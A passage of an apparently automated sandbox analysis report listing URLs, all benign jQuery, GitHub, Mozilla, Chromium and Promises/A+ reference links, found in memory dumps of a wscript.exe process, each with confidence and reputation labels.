00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://bugs.jquery.com/ticket/13378wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://dev.w3.org/csswg/cssom/#resolved-valueswscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://jsperf.com/thor-indexof-vs-for/5wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/jquery/jquery/pull/557)wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonwscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://bugzilla.mozilla.org/show_bug.cgi?id=687787wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://promisesaplus.com/#point-48wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.htmlwscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.com/jquery/jquery/pull/764wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/jquery/sizzle/pull/225wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://bugzilla.mozilla.org/show_bug.cgi?id=491668wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://code.google.com/p/chromium/issues/detail?id=333868wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://promisesaplus.com/#point-64wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 